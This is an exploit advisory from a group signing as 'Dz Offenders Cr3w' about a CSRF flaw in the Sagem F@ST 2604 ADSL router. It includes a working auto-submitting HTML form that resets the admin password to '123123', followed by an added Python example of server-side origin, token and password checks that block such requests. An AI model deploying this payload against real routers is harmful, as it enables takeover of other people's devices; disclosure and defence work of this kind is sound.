========================================================== ==========================================================
####
Title: Sagem F@ST 2604 CSRF Vulnerability (ADSL Router)
Author: KinG Of PiraTeS t5r@hotmail.com
Website: http://www.sagem.com/index.php
Affected Versions: 253180972B (other versions may also be affected)
Test Platform: [Windows 7 Edition Intégrale]
####
##
# |> -------- ++ = [Dz Offenders Cr3w] ==++ -------- <|
1) Introduction
2) defect description
3) test example
> ----------------------------------------------------------------
1) Introduction
The Sagemcom F@st 2604 is a wireless ADSL2/2+ router with one RJ-11 WAN port and four 10/100Base-T LAN ports.
2) defect description
On the Sagem F@st 2604, a forged cross-site request can change the default "Admin" password, or any user's password, through the web interface listening on TCP/IP port 80.
Other versions may also be affected.
3) test example
<html>
<body onload="javascript:document.forms[0].submit()">
<h2>Password successfully changed [CSRF Exploit change ADMIN password]</h2>
<form method="POST" name="form0" action="http://www.bkjia.com/password.cgi?SysPassword=123123">
</form>
</body>
</html>
-
123123 is the new password
-
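The form above carries only the new password, so the handler has nothing that ties the request to the router's own pages. The following is an added example (not part of the original advisory and not the vendor's firmware code) of the server-side checks that would reject such a request. The router origin, the `csrf_token` and `OldPassword` field names, and the session layout are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the origin the router's own admin pages are served from.
ROUTER_ORIGINS = {"http://router.example"}

def _same(a, b):
    """Constant-time string comparison."""
    return hmac.compare_digest(a.encode(), b.encode())

def same_origin(headers):
    """True only if Origin (or, failing that, Referer) names the router."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # no provenance at all: refuse rather than guess
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" in ROUTER_ORIGINS

def check_password_change(method, query, form, headers, session):
    """Return (allowed, reason) for a request to the password handler."""
    if method != "POST":
        return False, "state change must use POST"
    if "SysPassword" in query:
        return False, "new password must not travel in the query string"
    if not same_origin(headers):
        return False, "cross-origin or unattributed request"
    token = form.get("csrf_token", "")  # hypothetical field name
    if not token or not _same(token, session.get("csrf_token", "")):
        return False, "missing or wrong anti-CSRF token"
    # Hypothetical field; real firmware would verify against a stored hash.
    if not _same(form.get("OldPassword", ""), session["password"]):
        return False, "current password not confirmed"
    return True, "ok"

# Constructed requests; FORGED mirrors the advisory's auto-submitting form.
SESSION = {"csrf_token": secrets.token_hex(16), "password": "old-admin-pw"}
FORGED = dict(method="POST", query={"SysPassword": "123123"}, form={},
              headers={"Origin": "http://attacker.example"}, session=SESSION)
LEGIT = dict(method="POST", query={}, headers={"Origin": "http://router.example"},
             form={"SysPassword": "n3w-pw", "OldPassword": "old-admin-pw",
                   "csrf_token": SESSION["csrf_token"]}, session=SESSION)

if __name__ == "__main__":
    print(check_password_change(**FORGED))
    print(check_password_change(**LEGIT))
```

Each check fails closed on its own: a request with no Origin or Referer is refused, and a same-origin request still needs both the per-session token and the current password.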
####
Peace From Algeria